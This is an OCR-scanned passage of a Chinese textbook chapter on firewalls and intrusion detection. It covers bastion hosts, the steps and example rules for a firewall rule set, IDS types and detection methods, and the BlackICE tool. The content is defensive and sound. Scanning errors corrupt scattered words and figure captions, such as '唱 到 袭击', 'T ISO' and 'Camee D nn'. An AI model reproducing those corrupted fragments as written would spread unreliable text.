堡垒 主机 是 网 络 中 最 容易 受到 侵害 的 主机 ,所 以 堡垒 主机 也 必须 是 自身 保护 最 完善 的 
主机 。 一 个 堡垒 主机 使 用 两 块 网 卡 ,每 个 网 卡 连接 不 同 的 网 络 。 一 块 网 卡 连接 公司 的 内 部 


His 双 宿 主 堡垒 主机 模型 
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防火 墙 防火 墙 防火 墙 


BEE 
Camee D nn 外 部 网 络 


图 5-5 屏蔽 子 网 模型 


网 络 用 来 管理 .控制 和 保护 ,而 另 一 块 连接 另 一 个 网 络 ,通常 是 公 网 ,也 就 是 Internet, 

堡垒 主机 是 一 台 完 全 暴露 给 外 网 攻击 的 主机 。 它 没有 任何 防火 墙 或 者 包 过 滤 路 由 器 设 
备 保护 。 堡 又 主机 执行 的 任务 对 于 整个 网 络 安全 系统 至 关 重 要 。 事 实 上 ,防火 墙 和 包 过 滤 
路 由 器 也 可 以 被 看 作 保 又 主机 。 由 于 堡垒 主 机 完全 暴露 在 外 网 安全 威胁 之 下 ,需要 做 许多 
工作 来 设计 和 配置 堡垒 主机 ,使 它 遭 到 外 网 攻击 成 功 的 风险 性 减 至 最 低 。 其 他 类 型 的 保全 
主机 包括 Web、Mail.DNS、FTP 服务 器 。 

一 些 网 络 管理 员 会 用 堡垒 主机 作 牺 牲 品 来 换取 网 络 的 安全 。 这 些 主机 吸引 入 侵 者 的 注 
意 力 ,耗费 攻击 真正 网 络 主机 的 时 间 并 且 使 追踪 入 侵 企图 变 得 更 加 容易 。 


5.1.4 建立 防火 墙 的 步骤 


建立 一 个 可 靠 的 规则 集 对 于 实现 一 个 成 功 的 .安全 的 防火 墙 来 说 是 非常 关键 的 一 步 。 
因为 如 果 防 火 墙 规则 集 配置 错误 ,再 好 的 防火 墙 也 只 是 摆设 。 在 安全 审计 中 ,经常 能 看 到 一 
个 巨 资 购 入 的 防火 墙 由 于 某 个 规则 配置 的 错误 而 将 机 构 暴 露 于 巨大 的 危险 之 中 。 

成 功 地 创建 一 个 防火 墙 系统 一 般 需 要 6 步 : 四 制定 安全 策略 ; 加 搭建 安全 体系 结构 ; 
加 制定 规则 次 序 ; @ 落 实 规则 集 ; @ 注 意 更 换 控制 ; @ 做 好 审计 工作 。 

1. 制定 安全 策略 

防火 墙 和 防火 墙 规则 集 只 是 安全 策略 的 技术 实现 。 管 理 层 规定 实施 什么 样 的 安全 策 
略 ,防火 墙 是 策略 得 以 实施 的 技术 工具 。 所 以 ,在 建立 规则 集 之 前 ,必须 首先 理解 安全 策略 ， 
假设 它 包含 以 下 三 方面 内 容 。 

(1) 内 部 雇员 访问 Internet 不 受 限 制 。 

(2) 规定 Internet 用 户 有 权 使 用 公司 的 Web Server 和 Internet E-mail, 

(3) 任何 进入 公用 内 部 网 络 的 通话 必须 经 过 安全 认证 和 加 密 。 

显然 ,大 多 数 机 构 的 安全 策略 要 远 远 比 这 复杂 ,应 根据 单位 的 实际 情况 制定 安全 策略 。 

2. 搭建 安全 体系 结构 

作为 一 个 网 络 管理 员 , 是 要 将 安全 策略 转化 为 安全 体系 结构 。 根 据 安全 策略 “规定 
Internet 用 户 有 权 使 用 公司 的 Web Server 和 Internet E-mail”。 这 就 要 求 我 们 要 为 公司 建 
立 Web 和 E-mail 服务 器 。 由 于 任何 人 都 能 访问 Web 和 E-mail 服务 器 ,所 以 不 能 信任 它 
们 。 我 们 通过 把 它们 放 入 DMZ 来 实现 该 项 策略 。DMZ 是 一 个 孤立 的 网 络 ,通常 把 不 信任 
的 系统 放 在 那里 ,DMZ 中 的 系统 不 能 启动 连接 内 部 网 络 。DMZ 有 两 种 类 型 : 有 保护 的 和 
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无 保护 的 。 有 保护 的 DMZ 是 与 防火 墙 脱离 的 孤立 的 部 分 ; 无 保护 的 DMZ 是 介 于 路 由 器 
和 防火 墙 之 间 的 网 络 部 分 。 这 里 建议 使 用 有 保护 的 DMZ, 我 们 把 Web 和 E-mail 服务 器 放 
在 那里 。 

3. 制定 规则 次 序 

在 建立 规则 集 之 前 ,有 一 件 事 必 须 提 及 , 即 规则 次 序 。 哪 条 规则 放 在 哪 条 之 前 是 非常 关 
键 的 。 同 样 的 规则 ,以 不 同 的 次 序 放置 ,可 能 会 完全 改变 防火 墙 的 运转 情况 。 很 多 防火 墙 
(例如 SunScreen EFS, Cisco IOs、FW-1) 以 顺序 方式 检查 信息 包 , 当 防火 墙 接 收 到 一 个 信息 
包 时 , 它 先 与 第 一 条 规则 相 比 较 , 然 后 是 第 二 条 、 第 三 条 …… 当 它 发 现 一 条 匹配 规则 时 ,就 停 
止 检 查 并 应 用 那 条 规则 。 如 果 信 息 包 经 过 每 一 条 规则 而 没有 发 现 匹配 ,这 个 信息 包 便 会 被 
拒绝 。 一 般 来 说 ,通常 的 顺序 是 : 较 特殊 的 规则 在 前 , 较 普通 的 规则 在 后 。 防 止 在 找到 一 个 
特殊 规则 之 前 一 个 普通 规则 便 被 匹配 ,这 可 以 使 防火 墙 避 免 配置 错误 。 

4. 落实 规则 集 

选 好 素材 就 可 以 建立 规则 集 了 ,下 面 就 简要 概述 每 条 规则 。 

1) 切断 默认 

通常 在 默认 情况 下 需要 切断 默认 性 能 。 

2) 允许 内 部 出 网 

规则 是 允许 内 部 网 络 的 任何 人 出 网 ,与 安全 策略 中 所 规定 的 一 样 ,所 有 的 服务 都 被 许可 。 

3) 添加 锁定 

现在 添加 锁定 规则 ,阻塞 对 防火 墙 的 任何 访问 ,这 是 所 有 规则 集 都 应 有 的 一 条 标准 规 
则 ,除了 防火 墙 管 理 员 ,任何 人 都 不 能 访问 防火 墙 。 

4) 丢弃 不 匹配 的 信息 包 

在 默认 情况 下 ,丢弃 所 有 不 能 与 任何 规则 匹配 的 信息 包 。 但 这 些 信息 包 并 没有 被 记录 。 
把 它 添 加 到 规则 集 末尾 来 改变 这 种 情况 ,这 是 每 个 规则 集 都 应 有 的 标准 规则 。 

5) 丢弃 并 不 记录 

通常 网 络 上 大 量 被 防火 墙 丢弃 并 记录 的 通信 通话 会 很 快 将 日 志 填 满 。 创 立 一 条 规则 丢 
弃 或 拒绝 这 种 通话 但 不 记录 它 。 这 是 一 条 标准 规则 。 

6) 允许 DNS 访问 

允许 Internet 用 户 访问 DNS 服务 器 。 

7) 允许 邮件 访问 

允许 Internet 和 内 部 用 户 通过 SMTP( 简 单 邮件 传递 协议 ) 访 问 邮 件 服务 器 。 

8) 允许 Web 访问 

允许 Internet 和 内 部 用 户 通 过 HTTP( 服 务 程序 所 用 的 协议 ) 访 问 Web 服务 器 。 

9) 阻塞 DMZ 

内 部 用 户 公开 访问 DMZ, 这 是 必须 阻止 的 。 

10) 允许 内 部 的 POP 访问 

让 内 部 用 户 通 过 POP( 邮 局 协议 ) 访 问 邮 件 服务 器 。 

1D 强化 DMZ 的 规则 

DMZ 应 该 从 不 启动 与 内 部 网 络 的 连接 。 如 果 DMZ 能 这 样 做 ,就 说 明 它 是 不 安全 的 。 
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这 里 希望 加 上 这 样 一 条 规则 ,只 要 有 从 DMZ 到 内 部 用 户 的 通话 , 它 就 会 发 出 拒绝 指令 ,做 
记录 并 警告 。 

12) 允许 管理 员 访 问 

允许 管理 员 ( 受 限于 特殊 的 资源 IP) 以 加 密 方式 访问 内 部 网 络 。 

13) 提高 性 能 

只 要 有 可 能 ,就 把 最 常用 的 规则 移 到 规则 集 的 项 端 。 因 为 防火 墙 只 分 析 较 少数 的 规则 ， 
这 样 能 提高 防火 墙 性 能 。 

14) 增加 IDS 

对 那些 喜欢 基础 扫描 检测 的 人 来 说 ,这 会 有 帮助 。 

15) 附加 规则 

可 以 添加 一 些 附 加 规则 ,例如 ,阻塞 与 AOL ICQ 的 连接 ,不 要 阻塞 入 口 ,只 阻塞 目的 文 
件 AOL 服务 器 。 

5. 注意 更 换 控制 

在 恰当 地 组 织 好 规则 之 后 ,还 建议 写 上 注释 并 经 常 更 新 它们 。 注 释 可 以 帮助 用 户 明白 
哪 条 规则 做 什么 ,对 规则 理解 得 越 好 ,错误 配置 的 可 能 性 就 越 小 。 对 那些 有 多 重 防 火 墙 管理 
员 的 大 机 构 来 说 ,建议 当 规 则 被 修改 时 ,把 下 列 信息 加 入 注释 中 ,这 可 以 帮助 用 户 跟踪 谁 修 
改 了 哪 条 规则 以 及 修改 的 原因 。 

COD 规则 更 改 者 的 名 字 。 

(2) 规则 变更 的 日 期 /时 间 。 

(3) 规则 变更 的 原因 。 

6. 做 好 审计 工作 

建立 好 规则 集 后 ,检测 它 很 关键 。 防 火 墙 实际 上 是 一 种 隔离 内 外 网 的 工具 。 在 如 今 
Internet 访问 的 动态 世界 里 ,在 实现 过 程 中 很 容易 犯错 误 。 通 过 建立 一 个 可 靠 的 ,简单 的 规 
则 集 , 可 以 创建 一 个 更 安全 的 被 防火 墙 所 隔离 的 网 络 环境 。 

需要 注意 的 是 ,规则 越 简单 越 好 ,一 个 简单 的 规则 集 是 建立 一 个 安全 的 防火 墙 的 关键 所 
在 。 网 络 的 头号 敌人 是 错误 配置 。 为 什么 当 意外 地 将 消息 访问 协议 (IMAP) 公 开 时 ,那些 
坏 家 伙 会 试图 悄悄 携带 欺骗 性 的 .片断 的 信息 包 通 过 防火 墙 ? 请 尽量 保持 规则 集 简洁 和 简 
短 ,因为 规则 越 多 ,就 越 可 能 犯错 误 ,规则 越 少 ,理解 和 维护 就 越 容 易 。 一 个 好 的 准则 是 最 好 
不 要 超过 30 条 。 一 旦 规则 超过 50 条 ,就 会 以 失败 而 告终 。 要 从 很 多 规则 入 手 时 ,就 要 认真 
检查 一 下 整个 安全 体系 结构 ,而 不 仅仅 是 防火 墙 。 规 则 越 少 , 规 则 集 就 越 简洁 ,错误 配置 的 
可 能 性 就 越 小 ,系统 就 越 安 全 。 因 为 规则 少 意味 着 只 分 析 少 数 的 规则 ,防火 墙 的 CPU 周期 
就 短 ,防火 墙 效率 就 可 以 提高 。 


5.2 人 侵 检 测 


入 侵 检测 系统 是 一 种 对 网 络 传输 进行 即时 监视 ,在 发 现 可 疑 传输 时 发 出 警报 或 者 采取 
主动 反应 措施 的 网 络 安全 系统 。 它 与 其 他 网 络 安全 系统 的 不 同 之 处 在 于 ,IDS 是 一 种 积极 
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主动 的 安全 防护 技术 。IDS 最 早出 现在 1980 年 4 月。20 世纪 80 年 代 中 期 ,IDS 逐渐 发 展 
成 为 入侵 检 测 专家 系统 (IDES) , 1990 年 ,IDS 分 化 为 基于 网 络 的 IDS 和 基于 主机 的 IDS, 
后 又 出 现 分 布 式 IDS, 

由 于 入侵 检测 系统 的 市 场 在 近 几 年 中 飞速 发 展 ,许多 公司 投入 到 这 一 领域 中 来 。 
Venustech( 启 明星 辰 ) Internet Security System (ISS)、 思 科 、 赛 门 铁 克 等 公司 都 推出 了 自 
己 的 产品 。 


5.2.1 入 侵 检 测 系统 的 概念 


和信 侵 检测 系统 (Intrusion Detection System,IDS) 指 的 是 一 种 硬件 或 者 软件 系统 ,通过 
实时 监视 系统 对 系统 资源 的 非 授 权 使 用 能 够 做 出 及 时 的 判断 和 记录 ,一 旦 发 现 异常 情况 就 
发 出 报警 。 

入 侵 检 测 (intrusion detection) 是 对 入 侵 行为 的 检测 , 它 通 过 收集 和 分 析 网 络 行为 .安全 
日 志 、 审 计数 据 、 其 他 网 络 上 可 以 获得 的 信息 以 及 计算 机 系统 中 若干 关键 点 的 信息 ,检查 网 
络 或 系统 中 是 否 存 在 违反 安全 策略 的 行为 和 被 攻击 的 迹象 。 入 侵 检测 作为 一 种 积极 主动 的 
安全 防护 技术 ,提供 了 对 内 部 攻击 、 外 部 攻击 和 误 操 作 的 实时 保护 ,在 网 络 系统 受到 危害 之 
前 拦截 和 响应 入 侵 , 因 此 被 认为 是 防火 墙 之 后 的 第 二 道 安全 闸门 。 在 不 影响 网 络 性 能 的 情 
况 下 ,能 对 网 络 进 行 监测 。 入 侵 检测 通过 执行 以 下 任务 来 实现 : 监视 ,分 析 用 户 及 系统 活 
动 ; 系统 构造 和 弱点 的 审计 ; 识别 反映 已 知 进攻 的 活动 模式 并 向 相关 人 士 报警 ; 异常 行为 
模式 的 统计 分 析 ; 评估 重要 系统 和 数据 文件 的 完整 性 ; 操作 系统 的 审计 跟踪 管理 ,并 识别 
用 户 违反 安全 策略 的 行为 。 

入 侵 检 测 是 防火 墙 的 合理 补充 ,帮助 系统 对 付 网 络 攻 击 ,扩展 了 系统 管理 员 的 安全 管理 
能 力 ( 包 括 安全 审计 、 监 视 、 进 攻 识别 和 响应 ) ,提高 了 信息 安全 基础 结构 的 完整 性 。 它 从 计 
算 机 网 络 系统 中 的 若干 关键 点 收集 信息 ,并 分 析 这 些 信 息 ,看 看 网 络 中 是 否 有 违反 安全 策略 
的 行为 和 唱 到 袭击 的 迹象 。 入 侵 检测 被 认为 是 防火 墙 之 后 的 第 二 道 安全 闸门 ,在 不 影响 网 
络 性 能 的 情况 下 能 对 网 络 进行 监测 ,从 而 提供 对 内 部 攻击 、 外 部 攻击 和 误 操作 的 实时 保护 。 


5.2.2 入 侵 检 测 系 统 功 能 


1. 识别 黑客 常用 入 侵 与 攻击 手段 

入 侵 检测 技术 通过 分 析 各 种 攻击 的 特征 ,可 以 全 面 快速 地 识别 探测 攻击 、 拒 绝 服务 攻 
击 \ 缓 冲 区 溢出 攻击 、 电 子 邮 件 攻击 、 浏 览 器 攻击 等 各 种 常用 攻击 手段 ,并 做 相应 的 防范 。 一 
般 来 说 ,黑客 在 进行 人 侵 的 第 一 步 探 测 、 收 集 网 络 及 系统 信息 时 ,就 会 被 IDS 捕获 ,向 管理 
员 发 出 警告 。 

2. 监控 网 络 异常 通信 

IDS 系统 会 对 网 络 中 不 正常 的 通信 连接 做 出 反应 ,保证 网 络 通信 的 合法 性 ; 任何 不 符 
合 网 络 安全 策略 的 网 络 数据 都 会 被 IDS 侦 测 到 并 警告 。 

3. 鉴别 对 系统 漏洞 及 后 门 的 利用 

IDS 系统 一 般 带 有 系统 漏洞 及 后 门 的 详细 信息 ,通过 对 网 络 数据 包 连 接 的 方式 .连接 端 
口 以 及 连接 中 特定 的 内 容 等 特征 分 析 : 可 以 有 效 地 发 现 网 络 通信 中 针对 系统 漏洞 进行 的 非 
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法 行为 。 

4. 完善 网 络 安全 管理 

IDS 通过 对 攻击 或 人 侵 的 检测 及 反应 ,可 以 有 效 地 发 现 和 防止 大 部 分 的 网 络 犯罪 行为 ， 
给 网 络 安全 管理 提供 了 一 个 集中 方便 ,有效 的 工具 。 使 用 IDS 系统 的 监测 、 统 计 分 析 、 报 
表 功 能 ,可 以 进一步 完善 网 络 管理 。 


5.2.3 入 侵 检 测 系统 分 类 


1. 基于 主机 

一 般 主要 使 用 操作 系统 的 审计 、 跟 踪 日 志 作为 数据 源 , 某 些 也 会 主动 与 主机 系统 进行 交 
互 以 获得 不 存在 于 系统 日 志 中 的 信息 以 检测 入 侵 。 这 种 类 型 的 检测 系统 不 需要 额外 的 硬 
件 , 对 网 络 流量 不 敏感 ,效率 高 ,能 准确 定位 入 侵 并 及 时 进行 反应 ,但 是 占用 主机 资源 ,依赖 
于 主机 的 可 靠 住 ,所 能 检测 的 攻击 类 型 受 限 ,不 能 检测 网 络 攻击 。 

2. 基于 网 络 

通过 被 动 地 监听 网 络 上 传输 的 原始 流量 ,对 获取 的 网 络 数据 进行 处 理 , 从 中 提取 有 用 的 
信息 ,再 通过 与 已 知 攻击 特征 相 匹配 或 与 正常 网 络 行为 原型 相 比较 来 识别 攻击 事件 。 此 类 
检测 系统 不 依赖 操作 系统 作为 检测 资源 ,可 应 用 于 不 同 的 操作 系统 平台 ; 配置 简单 ,不 需要 
任何 特殊 的 审计 和 登录 机 制 ; 可 检测 协议 攻击 、 特 定 环境 的 攻击 等 多 种 攻击 。 但 它 只 能 监 
视 经 过 本 网 段 的 活动 ,无 法 得 到 主机 系统 的 实时 状态 ,精确 度 较 差 。 大 部 分 入侵 检测 工具 都 
是 基于 网 络 的 人 侵 检 测 系统 。 

3. 分 布 式 

这 种 人 侵 检测 系统 一 般 为 分 布 式 结构 , 巾 多 个 部 件 组 成 ,在 关键 主机 上 采用 主机 入 侵 检 
测 ,在 网 络 关键 结 点 上 采用 网 络 信 侵 检测 ,同时 分 析 来 自主 机 系统 的 审计 日 志和 来 自 网 络 的 
数据 流 ,判断 被 保护 系统 是 否 受到 攻击 o 


5.2.4. 入 侵 检 测 系 统 的 方法 


入 侵 检测 系统 的 方法 归纳 起 来 有 两 类 : 异常 检测 方法 和 误 用 检测 方法 。 

1. 异常 检测 方法 

异常 检测 的 假设 是 入 侵 者 活动 异常 于 正常 主体 的 活动 。 根 据 这 一 理念 建立 主体 正常 活 
动 的 “活动 简 档 ”, 将 当前 主体 的 活动 状况 与 “活动 简 档 ” 相 比较 , 当 违反 其 统计 规律 时 ,认为 
该 活动 可 能 是 “入侵 ”行为 。 异 常 检测 的 难题 在 于 如 何 建立 “活动 简 档 ”以 及 如 何 设计 统计 算 
法 ,从 而 不 把 正常 的 操作 作为 “入 侵 " 或 忽略 真正 的 “入 侵 ” 行 为。 

在 异常 人 侵 检测 系统 中 常常 采用 以 下 几 种 检测 方法 。 

(1) 基于 贝 叶 斯 推理 检测 法 : 是 通过 在 任何 给 定 的 时 刻 , 测 量变 量 值 ,推理 判断 系统 是 
否 发 生 入 侵 事 件 。 

(2) 基于 特征 选择 检测 法 : 指 从 一 组 度量 中 挑选 出 能 检测 入 侵 的 度量 ,用 它 来 对 入 侵 
行为 进行 预测 或 分 类 。 

G) 基于 贝 叶 斯 网 络 检 测 法 : 用 图 形 方式 表示 随机 变量 之 间 的 关系 。 通 过 指定 的 与 邻 
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接 结 点 相关 一 个 小 的 概率 集 来 计算 随机 变量 的 连接 概率 分 布 。 按 给 定 全 部 结 点 组 合 , 所 有 
根 结 点 的 先 验 概率 和 非 根 结 点 概率 构成 这 个 集 。 贝 叶 斯 网 络 是 一 个 有 向 图 , 弧 表示 父子 结 
点 之 间 的 依赖 关系 。 当 随机 变量 的 值 变 为 已 知 时 ,就 允许 将 它 吸收 为 证 据 , 为 其 他 的 剩余 随 
机 变量 条 件 值 判断 提供 计算 框架 。 

(4) 基于 模式 预测 的 检测 法 : 事件 序列 不 是 随机 发 生 的 而 是 遵循 某 种 可 辨别 的 模式 ， 
是 基于 模式 预测 的 异常 检测 法 的 假设 条 件 , 其 特点 是 事件 序列 及 相互 联系 被 考虑 到 了 ,只 关 
心 少数 相关 安全 事件 是 该 检测 法 的 最 大 优点 。 

(5) 基于 统计 的 异常 检测 法 : 是 根据 用 户 对 象 的 活动 为 每 个 用 户 都 建立 一 个 特征 轮廓 
表 , 通 过 对 当前 特征 与 以 前 已 经 建立 的 特征 进行 比较 ,来 判断 当前 行为 的 异常 性 。 用 户 特征 
轮廓 表 要 根据 审计 记录 情况 不 断 更 新 。 轮 廓 表 包 含 许多 衡量 指标 ,这 些 指标 值 要 根据 经 验 
值 或 一 段 时 间 内 的 统计 而 得 到 。 

(6) 基于 机 器 学 习 检 测 法 : 是 根据 离散 数据 临时 序列 学 习 获 得 网 络 、 系 统 和 个 体 的 行 
为 特征 ,并 提出 了 一 个 实例 学 习 法 IBL, IBL 是 基于 相似 度 , 该 方法 通过 新 的 序列 相似 度 计 
算 将 原始 数据 (如 离散 事件 流 和 无 序 的 记录 ) 转 化 成 可 度量 的 空间 。 然 后 ,应 用 IBL 学 习 技 
术 和 一 种 新 的 基于 序列 的 分 类 方法 ,发 现 异常 类 型 事件 ,从 而 检测 入 侵 行 为 。 其 中 ,成 员 分 
类 的 概率 由 阔 值 的 选取 来 决定 。 

(7) 数据 挖掘 检测 法 : 数据 挖掘 的 目的 是 要 从 海量 的 数据 中 提取 出 有 用 的 数据 信息 。 
网 络 中 会 有 大 量 的 审计 记录 存在 ,审计 记录 大 多 都 是 以 文件 形式 存放 的 。 如 果 靠 手工 方法 
来 发 现 记录 中 的 异常 现象 是 远 远 不 够 的 ,所 以 将 数据 挖掘 技术 应 用 于 入 侵 检 测 中 ,可 以 
从 审计 数据 中 提取 有 用 的 知识 ,然后 用 这 些 知 识 去 检测 异常 人 侵 和 已 知 的 入 侵 。 采 用 的 
方法 有 KDD 算法 ,其 优点 是 善于 处 理 大 量 数据 的 能 力 与 数据 关联 分 析 的 能 力 ,但 是 实时 
性 较 差 。 

(8) 基于 应 用 模式 的 异常 检测 法 : 该 方法 是 根据 服务 请 求 类 型 .服务 请 求 长 度 、 服 务 请 
求 包 大 小 分 布 计算 网 络 服 务 的 异常 值 。 通 过 实时 计算 的 异常 值 和 所 训练 的 国 值 比较 ,从 而 
发 现 异常 行为 。 

(9) 基于 文本 分 类 的 异常 检测 法 : 该 方法 是 将 系统 产生 的 进程 调用 集合 转换 为 “ 文 
Pi". HH KK 邻 聚 类 文本 分 类 算法 ,计算 文档 的 相似 性 。 

2. 误 用 检测 方法 

误 用 入 侵 检测 系统 中 常用 的 检测 方法 有 以 下 几 种 。 

(1) 模式 匹配 法 : 常常 被 用 于 入 侵 检 测 技术 中 。 它 是 通过 把 收集 到 的 信息 与 网 络 入 侵 
和 系统 误 用 模式 数据 库 中 的 已 知 信息 进行 比较 ,从 而 对 违背 安全 策略 的 行为 进行 发 现 。 模 
式 匹 配 法 可 以 显著 地 减少 系统 负担 ,有 较 高 的 检测 率 和 准确 率 。 

(2) 专家 系统 法 : 这 个 方法 的 思想 是 把 安全 专家 的 知识 表示 成 规则 知识 库 , 再 用 推理 
算法 检测 入 侵 。 主 要 是 针对 有 特征 的 入 侵 行为 。 

(3) 基于 状态 转移 分 析 的 检测 法 : 该 方法 的 基本 思想 是 将 攻击 看 成 一 个 连续 的 、 分 
步骤 的 并 且 各 个 步骤 之 间 有 一 定 关联 的 过 程 。 在 网 络 中 发 生 和 人 侵 时 及 时 阻 断 入 侵 行为 ， 
防止 可 能 还 会 进一步 发 生 的 类 似 攻击 行为 。 在 状态 转移 分 析 方 法 中 ,一 个 渗透 过 程 可 以 
看 作 是 由 攻击 者 做 出 的 一 系列 的 行为 而 导致 系统 从 某 个 初始 状态 变 为 最 终 某 个 被 危害 的 


第 5 章 防火 墙 与 入 侵 检测 95 


5.2.5. 入 侵 检测 系统 的 步骤 

入 侵 检测 一 般 分 为 三 个 步骤 ,依次 为 信息 收集 、 数 据 分 析 、 响 应 (被 动 响应 和 主动 响应 ) 。 

1. 信息 收集 

包括 系统 、 网 络 .数据 及 用 户 活动 的 状态 和 行为 。 入 侵 检 测 利用 的 信息 一 般 来 自 系统 日 
志 、 目 录 以 及 文件 中 的 异常 改变 .程序 执行 中 的 异常 行为 及 物理 形式 的 入侵 信息 4 个 方面 。 

2. 数据 分 析 

数据 分 析 是 入 侵 检 测 的 核心 。 首 先 构建 分 析 器 ,把 收集 到 的 信息 经 过 预 处 理 ,建立 一 个 
行为 分 析 引 擎 或 模型 ,然后 向 模型 中 植 人 时间 数 据 , 在 知识 库 中 保存 植 人 数据 的 模型 。 数 据 
分 析 一 般 通 过 模式 匹配 ,统计 分 析 和 完整 性 分 析 三 种 手段 进行 。 前 两 种 方法 用 于 实时 入 侵 
检测 ,而 完整 性 分 析 则 用 于 事后 分 析 。 

3. 响应 

入 侵 检 测 系统 在 发 现 人 侵 后 会 及 时 做 出 响应 ,包括 切断 网 络 连接 .记录 事件 和 报警 等 。 
响应 一 般 分 为 主动 响应 (阻止 攻击 或 影响 进而 改变 攻击 的 进程 ) 和 被 动 响应 (报告 和 记录 所 
检测 出 的 问题 ) 两 种 类 型 。 主 动 响应 由 用 户 驱 动 或 系统 本 身 自动 执行 ,可 对 入 侵 者 采取 行动 
(如 断 开 连 接 ) 修正 系统 环境 或 收集 有 用 信息 ; 被 动 响应 则 包括 告警 和 通知 、 简 单 网 络 管理 
协议 CSNMP) 陷 阱 和 插件 等 。 另 外 ,还 可 以 按 策略 配置 响应 ,可 分 别 采 取 立 即 、 紧急、 适时 、 
本 地 的 长 期 和 全 局 的 长 期 等 行动 。 


5.2.6 入 侵 检测 系统 工具 BlackICE 


BlackICE Server Protection 软件 (以 下 简称 BlackICE) 是 由 ISS 安全 公司 出 品 的 一 款 
著名 的 入 侵 检测 系统 。 该 软件 在 1999 年 曾 获得 了 PC Magazine 的 技术 卓越 大 奖 。 专 家 对 
它 的 评语 是 :“ 对 于 没有 防火 墙 的 家 庭 用 户 来 说 ,BlackICE 是 一 道 不 可 缺少 的 防线 ; 而 对 于 
企业 网 络 , 它 又 增加 了 一 层 保 护 措 施 一 一 它 并 不 是 要 取代 防火 墙 ,而 是 阻止 企图 穿 过 防火 墙 
的 人 侵 者 。BlackICE 集成 有 非常 强大 的 检测 和 分 析 引 擎 ,可 以 识别 多 种 入 侵 技巧 ,给 予 用 
户 全 面 的 网 络 检测 以 及 系统 的 呵护 。 而 且 该 软件 还 具有 灵敏 度 及 准确 率 高 、 稳 定性 出 色 R 
统 资源 占用 率 极 少 的 特点 。 

BlackICE 安装 后 以 后 台 服 务 的 方式 运行 ,前端 有 一 个 控制 台 可 以 进行 各 种 报警 和 修改 
程序 的 配置 ,界面 很 简洁 。BlackICE 软件 最 具 特 色 的 地 方 是 内 置 了 应 用 层 的 入 侵 检测 功 
能 ,并 且 能 够 与 自身 的 防火 墙 进行 联动 ,可 以 自动 阻 断 各 种 已 知 的 网 络 攻 击 行为 。 

BlackICE 具有 强大 的 网 络 攻击 检测 能 力 , 大 部 分 的 非法 入 侵 都 会 被 发 现 ,并 采取 
Critical, Serious, Suspicious 和 Information 3X 4 种 级 别 报警 (分 别 用 红 橙黄、 黄 和 绿 4 种 颜 
色 标 识 ,危险 程度 依次 降低 ) 。 同 样 ,BlackICE 对 外 来 访问 也 设 有 4 个 安全 级 别 , 分 别 是 
Trusting, Cautious, Nervous 和 Paranoid, Paranoid 是 阻 断 所 有 的 未 授权 信息 ,Nervous 是 
阻 断 大 部 分 的 未 授权 信息 , Cautious 是 阻 断 部 分 的 未 授权 的 信息 ,而 软件 默认 设置 的 是 
Trusting 级 别 , 即 接受 所 有 的 信息 。 修 改 以 上 安全 级 别 ,可 以 通过 Tools 菜单 中 的 Edit 
BlackICE Settings 选择 Firewall 来 进行 ,如 图 5-6 所 示 。 具 体 使 用 参见 实验 12。 
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BlackICE Defender fo 


图 5-6 查看 主机 入 侵 的 详细 信息 


5.2.7 防火 墙 和 入 侵 检测 系统 的 区 别 和 联系 


1. 防火 墙 和 入 侵 检测 系统 的 区 别 

1) 概念 上 

防火 墙 是 设置 在 被 保护 网 络 ( 本 地 网 络 ) 和 外 部 网 络 (主要 是 Internet) 之 间 的 一 道 防御 
系统 ,以 防止 发 生 不 可 预测 的 、 潜 在 的 破坏 性 的 侵入 。 它 可 以 通过 检测 、 限 制 、 更 改 跨越 防 
火 墙 的 数据 流 , 尽 可 能 地 对 外 部 屏蔽 内 部 的 信息 、 结 构 和 运行 状态 ,以 此 来 保护 内 部 网 络 中 
的 信息 ,资源 等 不 受 外 部 网 络 中 非法 用 户 的 侵犯 。 

入 侵 检测 系统 是 对 入 侵 行为 的 发 觉 ,通过 从 计算 机 网 络 或 计算 机 的 关键 点 收集 信息 并 
进行 分 析 , 从 中 发 现 网 络 或 系统 中 是 否 有 违反 安全 策略 的 行为 和 被 攻击 的 迹象 。 

总 结 : 从 概念 上 可 以 看 出 ,防火 墙 是 针对 黑客 攻击 的 一 种 被 动 的 防御 ,IDS 则 是 主动 出 
击 寻找 潜在 的 攻击 者 ; 防火 墙 相 当 于 一 个 机 构 的 门卫 ,受到 各 种 限制 和 区 域 的 影响 , 即 凡是 
防火 墙 允 许 的 行为 都 是 合法 的 ; 而 IDS 则 相当 于 巡逻 兵 , 不 受 范围 和 限制 的 约束 ,这 也 造成 
T ISO 存在 误 报 和 漏 报 的 情况 出 现 。 

2) 功能 上 

防火 墙 的 主要 功能 是 过 滤 不 安全 的 服务 和 非法 用 户 : 所 有 进出 内 部 网 络 的 信息 都 必须 
通过 防火 墙 ,防火 墙 成 为 一 个 检查 点 .禁止 未 授权 的 用 户 访问 受 保护 的 网 络 。 

CD 控制 对 特殊 站 点 的 访问 : 防火 墙 可 以 允许 受 保护 网 络 中 的 一 部 分 主机 被 外 部 网 访 
问 ,而 另 一 部 分 则 被 保护 起 来 。 

(2) 作为 网 络 安全 的 集中 监视 点 : 防火 墙 可 以 记录 所 有 通过 它 的 访问 ,并 提供 统计 数 
据 , 提 供 预警 和 审计 功能 。 

人 侵 检测 系统 的 主要 任务 如 下 。 

(1) 监视 分析 用 户 及 系统 活动 ; 

(2) 对 异常 行为 模式 进行 统计 分 析 ,发 现 入侵 行为 规律 ; 


第 5 章 防火 墙 与 入 侵 检测 97 


C3) 检查 系统 配置 的 正确 性 和 安全 漏洞 ,并 提示 管理 员 修 补漏 洞 ; 

(4) 能 够 实时 对 检测 到 的 人 侵 行为 进行 响应 ; 

(5) 评估 系统 关键 资源 和 数据 文件 的 完整 性 ; 

(6) 操作 系统 的 审计 跟踪 管理 ,并 识别 用 户 违反 安全 策略 的 行为 。 

总 结 : 防火 墙 只 是 防御 为 主 ,通过 防火 墙 的 数据 便 不 再 进行 任何 操作 ,IDS 则 进行 实时 
的 检测 ,发 现 人 侵 行 为 即 可 做 出 反应 ,是 对 防火 墙 弱 点 的 修补 ; 防火 墙 可 以 允许 内 部 的 一 些 
主机 被 外 部 访问 ,IDS 则 没有 这 些 功 能 ,只 是 监视 和 分 析 用 户 和 系统 活动 。 

2. 防火 墙 和 入 侵 检 测 系统 的 联系 

第 一 ,IDS 是 继 防火 墙 之 后 的 又 一 道 防 线 , 防 火 墙 是 防御 ,IDS 是 主动 检测 ,两 者 相 结合 
有 力 地 保证 了 内 部 系统 的 安全 。 第 二 ,IDS 实时 检测 可 以 及 时 发 现 一 些 防 火 墙 没 有 发 现 的 
